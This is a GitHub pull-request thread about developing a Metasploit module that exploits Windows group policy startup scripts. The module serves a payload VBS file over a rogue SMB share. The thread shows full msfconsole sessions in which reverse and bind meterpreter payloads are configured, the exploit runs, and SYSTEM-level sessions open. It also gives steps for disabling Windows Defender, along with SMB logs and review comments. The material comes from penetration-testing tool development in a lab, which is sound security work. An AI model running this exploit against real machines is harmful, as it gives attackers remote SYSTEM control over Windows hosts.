Solve #5092: Add module to exploit dangerous group policy startup scripts

[jvazquez-r7]

Provides module to fix #5092.

Instead of BadSamba uses Msf::Exploit::Remote::SMB::Server::Share to make it easy :)

Verification

• Install Windows 7 SP1 (32 bit)
• Add a new GPO startup script. Setup as location the remote location where you will put the malicious file with msf (Ex: \172.16.158.1\test\test.vbs). How to add a new startup script: https://technet.microsoft.com/en-us/library/cc770556.aspx
• Run the new msf module with the SMB as you have configured the startup script:

msf > use exploit/windows/smb/group_policy_startup
msf exploit(group_policy_startup) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(group_policy_startup) > set FILE_NAME test.vbs
FILE_NAME => test.vbs
msf exploit(group_policy_startup) > set SHARE test
SHARE => test
msf exploit(group_policy_startup) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(group_policy_startup) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(group_policy_startup) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(group_policy_startup) > [*] File available on \\172.16.158.1\test\test.vbs...
[*] Server started.

• Restart the target system (win 7 sp1), log in, and wait a little. Shortly there should be a session on your msfconsole with SYSTEM privileges:

[*] Sending stage (880640 bytes) to 172.16.158.132
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.132:49257) at 2015-04-10 13:02:39 -0500

msf exploit(group_policy_startup) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
sServer username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
eComputer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.132 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(group_policy_startup) >

[necrose99]

looks like i can kill that gentoo ebuild :-) for fake gem badsamba

[jvazquez-r7]

This pull request, now also adds @hmoore-r7's feedback. Introduces the get_file_contents method to the Share mixin. It will be useful when support for multiple files is added. In the meanwhile the modules can override this module to provide custom contents. In this case, modules can provide the regenerated payload. So bind payloads work okey now (screenshot with set VERBOSE true):

msf exploit(group_policy_startup) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(group_policy_startup) > show options

Module options (exploit/windows/smb/group_policy_startup):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   FILE_NAME    test.vbs         no        VBS File name to share (Default: random .vbs)
   FOLDER_NAME                   no        Folder name to share (Default none)
   SHARE        test             no        Share (Default Random)
   SRVHOST      172.16.158.1     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      445              yes       The local port to listen on.


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf exploit(group_policy_startup) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started bind handler
[*] File available on \\172.16.158.1\test\test.vbs...
msf exploit(group_policy_startup) > [*] Server started.
[*] Started bind handler
[*] SMB Share - 172.16.158.132 Unknown SMB_COM_TRANSACTION2 subcommand: 10
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 Unknown SMB command 71, ignoring...
[*] SMB Share - 172.16.158.132 Unknown SMB command 71, ignoring...
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 Unknown TRANS2_QUERY_FILE_INFORMATION with loi: 40a
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 Unknown TRANS2_QUERY_FILE_INFORMATION with loi: 40a
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 Unknown TRANS2_QUERY_FILE_INFORMATION with loi: 40a
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.bat, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.cmd, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.exe, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.com, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.pif, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.lnk, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for }\test.vbs.dll, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 Unknown TRANS2_QUERY_FILE_INFORMATION with loi: 40a
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 Unknown TRANS2_QUERY_FILE_INFORMATION with loi: 40a
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 Unknown TRANS2_QUERY_FILE_INFORMATION with loi: 40a
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 Unknown TRANS2_QUERY_FILE_INFORMATION with loi: 40a
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.bat, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.cmd, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for $\test.vbs.exe, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.com, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for |\test.vbs.pif, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.lnk, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.dll, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 Unknown TRANS2_QUERY_FILE_INFORMATION with loi: 40a
[*] SMB Share - 172.16.158.132 Unknown SMB command 71, ignoring...
[*] Sending stage (880640 bytes) to 172.16.158.132
[*] Meterpreter session 2 opened (172.16.158.1:65409 -> 172.16.158.132:4444) at 2015-04-10 18:02:48 -0500

msf exploit(group_policy_startup) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.132 - Meterpreter session 2 closed.  Reason: User exit

[hdm]

Just curious, any reason to use a VBS versus EXE for this?

[hdm]

Looks like the SMB filename parameter is being misparsed in the mixin:
SMB_COM_NT_CREATE_ANDX for $\...

[Meatballs1]

Should switch on the extension and provide an exe/vbs/ps1 payload depending on the request?

[jlee-r7]

This will never get used because of the regenerate_payload. If it did, it would be wrong, because client-side modules should always call regenerate_payload

[jvazquez-r7]

on every on_client_connect the payload is regenerated for the client, it is just an initialization. I used this initialization because indeed the encoded payload should be good enough when reverse payloads are used, shouldn't be?

So yup, just initializing things. But I can avoid initialization if you think it is more correct.

[hdm]

Probably no reason to initialize it at all, since it will not be used.

[jlee-r7]

Right, it's getting generated here and then never used; wasted cycles. I would remove this line and the next.

[jvazquez-r7]

snif :-( I like to initialize things. But that's okey. I can delete initialization. I won't fight all of you =) proceeding!

[jvazquez-r7]

Test after last commit:

msf > use exploit/windows/smb/group_policy_startup
msf exploit(group_policy_startup) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(group_policy_startup) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(group_policy_startup) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(group_policy_startup) > set FILE_NAME test.vbs
FILE_NAME => test.vbs
msf exploit(group_policy_startup) > set SHARE test
SHARE => test
msf exploit(group_policy_startup) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
[*] File available on \\172.16.158.1\test\test.vbs...
msf exploit(group_policy_startup) > [*] Server started.
[*] Sending stage (880640 bytes) to 172.16.158.132
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.132:49164) at 2015-04-15 17:51:13 -0500

msf exploit(group_policy_startup) >
msf exploit(group_policy_startup) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
sServer username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
eComputer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.132 - Meterpreter session 1 closed.  Reason: User exit

[jvazquez-r7]

@hmoore-r7 asked:

Just curious, any reason to use a VBS versus EXE for this?

Because GPO supports VBS and PS initialization scripts. Used VBS to port the BadSamba technique. From the GPO options I would say it shouldn't support an EXE directly as initialization script. but Windows can be an "obscure" system and I didn't try really.

Looks like the SMB filename parameter is being misparsed in the mixin:
SMB_COM_NT_CREATE_ANDX for $\.

Yeah, the parsing isn't super good (or good at all) (see smb_cmd_nt_create_andx). But it's good enough for now where multiple files aren't supported. You just share one resource. But yup, in order to support multiple files in the Share mixin: a) we need to add the logic to the mixin and b) we need to make better parsing of queries sending paths in the payload. It's on the TODO once we decide to invest some more time to add the multi file support to the mixin.

[jvazquez-r7]

After doing 100 tests with @wchen-r7 (thanks a lot for helping with testing it!) we're having problems to make it work on a Fresh Windows 7 SP1 install after just adding the startup script to the group policy.

Maybe some configuration missing, but I'm unable to solve it, so marking as delayed until I can answer exactly what's going on.

[jvazquez-r7]

I recovered testing this night. Several minutes after logging in the fresh windows 7 SP1 I got it:

msf exploit(group_policy_startup) > jobs

Jobs
====

  Id  Name
  --  ----
  0   Exploit: windows/smb/group_policy_startup

msf exploit(group_policy_startup) >
[*] Sending stage (880640 bytes) to 172.16.158.131
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.131:49159) at 2015-04-27 22:57:51 -0500

I'm going to share / ask pcap's with @wchen-r7 see if I can figure out what's going on and finally fix.

[jvazquez-r7]

Did a couple of changes to the SMB handling, including a better parsing of the PATH in NT_CREATE_ANDX requests, as pointed by @hmoore-r7

Anyway I think the problems we are finding aren't related to the smb communication but to the execution of GPO policies on the windows side.

So. First thing. On windows 7 SP1 I've noticed Windows defender goes into action. So my first recommendation is to disable the Windows Defender service to be sure it isn't killing the payload.

After disabling Windows Defender I've noticed "System Startup scripts" aren't executed most of the times (I don't get SMB traffic neither :?).

In order to mitigate testing with "Logon scripts" looks more reliable. Logon scripts are executed once the user logs in in his session, and are executed with user privileges (instead of system privileges).

So in order to test:

• Disable the Windows Defender system service to be sure it isn't killing the payload.
• Configure a System startup script as described above
• Configure a Logon startup script. It's similar to an startup script. But it should be added to "User Configuration \ Windows Settings \ Scripts (Logon/ Logoff)" (from gpedit).
• Shutdown the target system (with both scripts configured and windows defender disabled).
• Run the module in the msfconsole (with VERBOSE as true)

msf > use exploit/windows/smb/group_policy_startup
msf exploit(group_policy_startup) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(group_policy_startup) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(group_policy_startup) > set share test
share => test
msf exploit(group_policy_startup) > set FILE_NAME test.vbs
FILE_NAME => test.vbs
msf exploit(group_policy_startup) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(group_policy_startup) > set verbose true
verbose => true
msf exploit(group_policy_startup) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
[*] File available on \\172.16.158.1\test\test.vbs...

• Start the target machine again. Wait until the logon window appears. Then wait some extra minutes (5 minutes is enough). VERIFY: is there any "SMB Share" messages in the console? If it's the case but you don't get a session, please write down the console output as a comment, also a pcap would be super useful.
• Login into windows. Now Logon startup scripts should run. Wait some minutes after login (5 / 10 minutes should be more than enough).
  VERIFY: is there any "SMB Share" messages in the console? If it's the case but you don't get a session, please write down the console output as a comment, also a pcap would be super useful.

With "Logon startup" scripts, which are more reliable on my case, after login, it's what I get in the console:

[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 Unknown SMB command 71, ignoring...
[*] SMB Share - 172.16.158.132 Unknown SMB command 71, ignoring...
[*] Sending stage (880640 bytes) to 172.16.158.132
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.132:49159) at 2015-05-04 16:19:51 -0500

[jvazquez-r7]

One more note, parsing and execution of startup scripts can be started manually with gpscript.exe /Startup in a CMD.

In this way should be easier to monitor with sysinternals and get network pcap's if everything else fails still. So hopefully I can debug what's going on and make fixes if it's a msf code fault.

So if with the verification steps above there aren't sessions with Startup, neither logon scripts, we can use this method for verification / debug. When forcing startup scripts to run manually I'm getting sessions every time.

See if everything helps to see what is going on! :)

[wchen-r7]

I will try again.